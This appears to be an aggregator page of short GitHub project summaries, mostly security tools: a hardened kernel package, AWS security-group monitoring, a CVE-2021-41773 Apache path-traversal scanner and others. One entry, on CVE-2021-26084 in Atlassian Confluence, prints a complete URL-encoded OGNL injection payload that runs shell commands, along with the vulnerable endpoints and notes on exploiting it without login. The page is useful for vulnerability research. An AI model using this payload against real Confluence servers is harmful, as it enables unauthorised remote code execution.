The Security-Hardened Linux kernel and modules; repackaged for Fedora Linux

This repository automatically downloads and extracts the latest hardened linux kernel from the Arch Linux repositories (https://archlinux.org/packages/extra/x86_64/linux-hardened). The kernel and all of its associated files are then packaged by the HardHat project’s Copr repository (https://copr.fedorainfracloud.org/coprs/noatsecure/HardHat), making it available to Fedora Linux users. GitHub View Github    

Read more

Continuous Security Group Rule Change Detection & Response at scale

Introduction Get notified of Security Group Changes across all AWS Accounts & Regions in an AWS Organization, with the ability to respond/revert those changes with a single button click from a Slack Channel.This is made easy and possible with the recent announcement of CloudTrail Lake, which helps aggregate CloudTrail logs from all accounts/regions in a queryable(if that’s a word :P) format. The infrastructure needed for this project is deployed as a CDK Application, which deploys a CodeCommit repository and a […]

Read more

Gives criticality score for an open source project

This project is maintained by members of theSecuring Critical Projects WG. Goals Generate a criticality score for every open source project. Create a list of critical projects that the open source community depends on. Use this data to proactively improve the security posture of these critical projects. Criticality Score A project’s criticality score defines the influence and importance of a project.It is a number between0 (least-critical) and 1 (most-critical). It is based on the followingalgorithmby Rob Pike: We use the […]

Read more

An opensourced roblox group finder writen in python 100% free and virus-free

an opensourced roblox group finder writen in python 100% free and virus-free note : if you don’t want install python or just use with ez the group finder you have just to install the compiled (.exe) vertion thats not require python ! please keep credits and don’t try to sell it. my roblox profil : https://www.roblox.com/users/373723880/profile ——— install ——— INSTALL SOURCE CODE (.py) ——— credits ——— compiled using pyinstaller GitHub View Github    

Read more

CVE-2021-26084,Atlassian Confluence OGNL

CVE-2021-26084,Atlassian Confluence OGNL注入漏洞 Atlassian Confluence 是企业广泛使用的维基系统,其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞,不需要任何用户的情况下在目标Confluence 中执行任意代码。 queryString参数执行任意命令 queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027 /pages/createpage.action这个接口需要一个可以创建页面的用户权限: /pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 http://your-ip:8090/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027 /pages/createpage-entervariables.action /pages/doenterpagevariables.action 不需要登录,用POST请求 脚本测试: 命令: 脚本利用: 命令: python3 -u http://example.com 参考: https://github.com/vulhub/vulhub/blob/master/confluence/ https://github.com/h3v0x/CVE-2021-26084_Confluence https://www.cnblogs.com/huangxiaosan/p/14290034.html https://blog.csdn.net/weixin_43072923/article/details/117083611 GitHub View Github    

Read more

Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 This script test Apache HTTP Server 2.4.49 Usage: CVE-2021-41773.py options Only for one IP: python CVE-2021-41773.py IP_address Option -f For IP list in fileExample: python CVE-2021-41773.py -f IP_address_list_filename Output python CVE-2021-41773.py AAA.BBB.CCC.DDD Server AAA.BBB.CCC.DDD IS VULNERABLE The    

Read more

A sample application that demonstrates integrating Firmalyzer’s IoTVAS API

This repository hosts a sample application that demonstrates integrating Firmalyzer’s IoTVAS API with the Rapid7 InsightVM platform. This integration enables InsightVM users to: accurately identify IoT/connected devices and their vulnerabilities in the firmware code level track and manage discontinued, outdated and vulnerable devices from within InsightVM platform Clone the repository content to a local folder and issue the following commands: python3 -mvenv env source env/bin/activate pip install -r requirements.txt Note: This application is based on the InsightVM API client (located […]

Read more
1 2 3 4